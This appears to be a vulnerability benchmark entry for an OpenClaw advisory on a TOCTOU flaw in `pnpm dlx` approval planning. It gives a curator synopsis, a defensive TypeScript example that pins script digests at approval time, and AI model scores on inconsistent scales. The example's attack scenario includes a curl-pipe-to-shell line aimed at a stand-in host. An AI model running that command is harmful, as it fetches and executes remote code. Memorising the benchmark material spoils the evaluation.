Severity: MODERATE
Repository: openclaw/openclaw
Published: Apr 7, 2026, 6:15 PM
Ref: 7cea7c29705b188b464cc9cdc107c275b94b2a72
Advisory summary
OpenClaw: pnpm dlx approvals did not bind local script operands
Curator analysis
Synopsis
`pnpm dlx` approval planning in the node-host did not bind mutable local script operands, so an approved local script could be changed before execution without invalidating the approval plan.
Vulnerability classes
approval integrity, time-of-check time-of-use (TOCTOU)
Sink hints
src/node-host/invoke-system-run-plan.ts
This file contains the node-host approval-plan builder, package-manager command unwrapping, and mutable file operand snapshot/revalidation logic. The fix adds `pnpm dlx`-specific parsing and fail-closed binding here.
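The snapshot/revalidation idea described above, as an added TypeScript example that is not OpenClaw's code and does not reproduce `src/node-host/invoke-system-run-plan.ts`. It uses an in-memory map as a stand-in for the filesystem, a hypothetical `planPnpmDlx` planner that unwraps `pnpm dlx [flags] <package> [args...]` and pins every local-path operand to its SHA-256 at approval time, and a `planArgvOnly` planner that shows the vulnerable shape (approval keyed on argv alone). The flag list, the local-path heuristic and the file contents are assumptions constructed for the example.

```typescript
import { createHash } from "crypto";

// Constructed in-memory filesystem (path -> content); stands in for real disk I/O.
type MemFs = Map<string, string>;

// One mutable file operand, pinned to the content digest observed at approval time.
// `sha256 === null` records that the path did not exist when the plan was built.
interface FileBinding {
  path: string;
  sha256: string | null;
}

interface ApprovalPlan {
  argv: string[];
  dlxPackage: string;
  bindings: FileBinding[];
}

function digest(content: string): string {
  return createHash("sha256").update(content).digest("hex");
}

// Heuristic for "this argument names a local file" (an assumption of this example).
function looksLikeLocalPath(arg: string): boolean {
  return /^(\.{1,2}\/|\/|~\/)/.test(arg) || /\.(m?[jt]s|c[jt]s|sh)$/.test(arg);
}

// dlx flags that consume the next argv element (assumed; not an exhaustive list).
const DLX_VALUE_FLAGS = new Set(["--package", "-p", "--dir", "-C"]);

// Hypothetical fixed planner: identify the dlx package, then bind every local-path
// operand after it to its current digest. Returns null (fail closed) when the package
// cannot be identified, so nothing unparseable receives a pre-approval.
function planPnpmDlx(argv: string[], fs: MemFs): ApprovalPlan | null {
  if (argv[0] !== "pnpm" || argv[1] !== "dlx") return null;
  let i = 2;
  while (i < argv.length && argv[i].startsWith("-")) {
    i += DLX_VALUE_FLAGS.has(argv[i]) ? 2 : 1;
  }
  const dlxPackage = argv[i];
  if (!dlxPackage) return null;
  const bindings: FileBinding[] = argv
    .slice(i + 1)
    .filter(looksLikeLocalPath)
    .map((path) => ({
      path,
      sha256: fs.has(path) ? digest(fs.get(path) as string) : null,
    }));
  return { argv: [...argv], dlxPackage, bindings };
}

// Vulnerable shape for contrast: approval keys on argv alone, so file content is unbound.
function planArgvOnly(argv: string[]): ApprovalPlan | null {
  if (argv[0] !== "pnpm" || argv[1] !== "dlx" || argv.length < 3) return null;
  return { argv: [...argv], dlxPackage: argv[2], bindings: [] };
}

// Run immediately before execution: every bound operand must still match its snapshot.
// A file created or deleted after approval also fails, since null !== digest.
function revalidate(plan: ApprovalPlan, fs: MemFs): { ok: boolean; reason?: string } {
  for (const b of plan.bindings) {
    const now = fs.has(b.path) ? digest(fs.get(b.path) as string) : null;
    if (now !== b.sha256) {
      return { ok: false, reason: `${b.path} changed since approval` };
    }
  }
  return { ok: true };
}

// The TOCTOU scenario on constructed data: approve, swap the script, then revalidate.
function scenario(): { vulnerableAllowed: boolean; fixedAllowed: boolean; untouchedAllowed: boolean } {
  const fs: MemFs = new Map([["./deploy.ts", "console.log('v1');"]]);
  const argv = ["pnpm", "dlx", "--silent", "tsx", "./deploy.ts", "--env", "prod"];
  const vulnerable = planArgvOnly(argv) as ApprovalPlan;
  const fixed = planPnpmDlx(argv, fs) as ApprovalPlan;
  const untouchedAllowed = revalidate(fixed, fs).ok;
  // Attacker replaces the approved script between approval and execution.
  fs.set("./deploy.ts", "require('child_process').execSync('curl evil | sh');");
  return {
    vulnerableAllowed: revalidate(vulnerable, fs).ok,
    fixedAllowed: revalidate(fixed, fs).ok,
    untouchedAllowed,
  };
}

console.log(scenario()); // { vulnerableAllowed: true, fixedAllowed: false, untouchedAllowed: true }
```

The two fail-closed decisions are the ones worth carrying into a real planner: refuse to build a plan when the dlx package cannot be located (otherwise operand positions are unknown and nothing can be bound), and treat "did not exist at approval time" as a binding too, so a script dropped into place after approval is rejected just like a modified one.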
Expected components
node-host command-planning path, pnpm dlx approval planning, mutable file operand binding
Model scores (5)

| Model | Rating | Score | Target Alignment | Source To Sink Reasoning | Impact And Exploitability | Evidence Quality | Overclaim Control |
|---|---|---|---|---|---|---|---|
| moonshotai/kimi-k2.5 | excellent | 93.00 | 29 | 28 | 18 | 9 | 9 |
| google/gemini-3.1-pro-preview | excellent | 93.00 | 29 | 29 | 18 | 8 | 9 |
| openai/gpt-5.4 | excellent | 93.00 | 29 | 29 | 17 | 10 | 8 |
| anthropic/claude-opus-4.6 | excellent | 92.00 | 9.8 | 9.6 | 8.8 | 8.9 | 8.7 |
| z-ai/glm-5.1 | excellent | 89.90 | 90 | 92 | 88 | 95 | 82 |